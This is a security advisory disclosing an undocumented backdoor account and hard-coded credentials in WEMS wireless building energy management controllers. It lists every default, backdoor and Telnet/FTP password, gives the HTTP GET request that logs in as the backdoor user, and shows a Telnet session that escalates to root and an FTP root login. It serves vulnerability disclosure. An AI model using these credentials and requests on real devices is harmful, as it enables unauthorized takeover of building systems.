WEMS BEMS 21.3.1 Undocumented Backdoor Account  
Vendor: WEMS Limited  
Product web page:  
Affected version: Web: 21.3.1  
Web: 20.0beta  
Web: 19.5  
Web: 18.4  
Firmware: 1.26.6 (OS: 5.3)  
Firmware: 1.23.7 (OS: 5.0)  
Firmware: 1.21.4 (OS: 4.1a-usb)  
Firmware: (OS: i686-1.1)  
Platform: Shockwave Flash (SWF) / CGI  
Summary: We (WEMS) offer the world's first fully wireless energy management system.  
Our solution enables your organization to take control of its energy costs, by monitoring  
lighting, heating and air conditioning equipment to identify wastage across multiple  
sites and start saving money instantly. Additionally, we offer a service which enables  
you to personally control the settings of your building - remotely, via text messaging  
and the internet - from wherever you happen to be in the world.  
Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded.  
These sets of credentials are never exposed to the end-user and cannot be changed through  
any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability  
by logging in using the backdoor account with highest privileges for administration and gain  
full system control. The Bash script is used to generate the default accounts  
on the system with their passwords and privilege level. The backdoor user cannot be seen in  
the users settings in the admin panel and it also uses an undocumented privilege level 3 when  
using the addhttpuser program which allows full availability of the features that the WEMS  
is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP  
access using the credentials gast:glasshou or root:glasshou.  
Tested on: Linux 2.6.16 armv5tejl  
Adam 7000 System  
WEMS OS 5.3  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2019-5552  
Advisory URL:  
Excerpt content of bash script:  
# cat /tmp/  
if [ -n "${varSystem}" ];then  
#add 'V.A.R.' user credentials  
/mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null  
/mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null  
/mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null  
#add 'wems' user credentials  
/mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null  
/mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null  
/mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null  
echo "Adding logging user credentials..."  
/mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null  
# Verify user added successfully...  
if [ "$?" -eq "255" ]  
echo "Error when adding logging user credentials - aborting.."  
cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers  
veri_user=`grep -e 'YWRhbWNvbGxlY3Q' /mnt/etc/httpusers`  
if [ -n "$veri_user" ]  
echo "User credentials added successfully."  
cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default  
echo "Error when adding user credentials - restoring defaults."  
cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers  
Default and hard-coded credentials:  
[Level 2/Admin - Web/SWF->CGI] : wems:kup5EF4s  
[Level 1/User - Web/SWF->CGI] : wemsuser:user  
[Level 0/View - Web/SWF->CGI] : wemsview:view  
[Level 3/Backdoor - Web/SWF->CGI] : YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam)  
V.A.R. (Value Added Reseller):  
[Level 2/Admin - Web/SWF->CGI] : var:88fRK66Q  
[Level 1/User - Web/SWF->CGI] : varuser:user  
[Level 0/View - Web/SWF->CGI] : varview:view  
[Level 500/User - Telnet/FTP] : gast:glasshou  
[Level 0/root - Telnet/FTP] : root:glasshou  
By calling the auth command through the cmd parameter, the cgiauth binary  
reads the /mnt/etc/httpusers file and checks validation for authentication.  
To login with the backdoor account the following HTTP GET request is made:  
GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1  
User-Agent: Noproblem/25.1  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Response observed:  
HTTP/1.1 200 OK  
content-type: text/html  
Transfer-Encoding: chunked  
Date: Fri, 13 Sep 2019 18:15:17 GMT  
Server: WEMS OS 5.0 Casino  
Running addhttpuser, reading httpusers file:  
# /mnt/bin/addhttpuser  
Usage is -u <username> -p <password> -l <level>  
# cat /mnt/etc/httpusers  
# ls -al /mnt/bin/addhttpuser  
-rwxr-xr-x 1 root root 16520 Jan 29 2014 /mnt/bin/addhttpuser  
Root shell:  
$ telnet  
Connected to  
Escape character is '^]'.  
- Adam 7000 System - Version 4.1a-usb -  
WEMS login: gast  
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
$ id  
uid=500(gast) gid=500  
$ su  
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
# id  
uid=0(root) gid=0(root)  
# netstat -nat  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0* LISTEN  
tcp 0 0* LISTEN  
tcp 0 0* LISTEN  
$ ftp  
WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.  
user root  
331 Password required for root.  
pass glasshou  
230 User root logged in.